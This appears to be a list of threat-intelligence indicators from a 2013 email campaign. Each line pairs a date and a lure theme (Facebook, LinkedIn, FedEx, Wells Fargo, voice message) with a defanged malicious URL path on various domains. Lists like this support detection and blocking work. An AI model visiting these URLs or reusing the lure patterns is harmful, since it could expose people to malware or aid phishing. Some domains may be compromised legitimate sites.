2013-09-27Facebookhxxp://integra-inspection.ca /forum/viewtopic.php
2013-09-27Facebookhxxp://watttrack.com /forum/viewtopic.php
2013-09-27LinkedInhxxp://directgrid.org /forum/viewtopic.php
2013-09-27LinkedInhxxp://directgrid.us /forum/viewtopic.php
2013-09-27LinkedInhxxp://integra-inspection.ca /forum/viewtopic.php
2013-09-27LinkedInhxxp://watttrack.com /forum/viewtopic.php
2013-10-01FedExhxxp://smartstartfinancial.com /forum/viewtopic.php
2013-10-01FedExhxxp://thewalletslip.com /forum/viewtopic.php
2013-10-01FedExhxxp://tootle.us /forum/viewtopic.php
2013-10-01FedExhxxp://tungstenrents.com /forum/viewtopic.php
2013-10-09WellsFargohxxp://integrainspection.co /forum/viewtopic.php
2013-10-09WellsFargohxxp://integrainspection.info /forum/viewtopic.php
2013-10-09WellsFargohxxp://integrainspection.net /forum/viewtopic.php
2013-10-09WellsFargohxxp://integrainspection.org /forum/viewtopic.php
2013-10-10FedExhxxp://denisemoussa.com /forum/viewtopic.php
2013-10-10FedExhxxp://integrainspection.net /forum/viewtopic.php
2013-10-10FedExhxxp://integrainspection.org /forum/viewtopic.php
2013-10-10FedExhxxp://integrainspections.ca /forum/viewtopic.php
2013-10-11FedExhxxp://integrainspection.net /forum/viewtopic.php
2013-10-11FedExhxxp://integrainspection.org /forum/viewtopic.php
2013-10-11FedExhxxp://integrainspections.ca /forum/viewtopic.php
2013-10-11FedExhxxp://integrainspections.co /forum/viewtopic.php
2013-10-14WellsFargohxxp://integrainspection.org /forum/viewtopic.php
2013-10-14WellsFargohxxp://integrainspections.ca /forum/viewtopic.php
2013-10-14WellsFargohxxp://integrainspections.co /forum/viewtopic.php
2013-10-14WellsFargohxxp://stratuscomputing.com /forum/viewtopic.php
2013-10-15WellsFargohxxp://integrainspection.org /forum/viewtopic.php
2013-10-15WellsFargohxxp://integrainspections.ca /forum/viewtopic.php
2013-10-15WellsFargohxxp://integrainspections.co /forum/viewtopic.php
2013-10-15WellsFargohxxp://stratuscomputing.com /forum/viewtopic.php
2013-10-23VoiceMessagehxxp://bernaandthebern-outs.com /forum/viewtopic.php
2013-10-23VoiceMessagehxxp://sayitwithpower.com /forum/viewtopic.php
2013-10-23VoiceMessagehxxp://thewinewars.com /forum/viewtopic.php
2013-10-23VoiceMessagehxxp://www.benfrederick.com:8080 /forum/viewtopic.php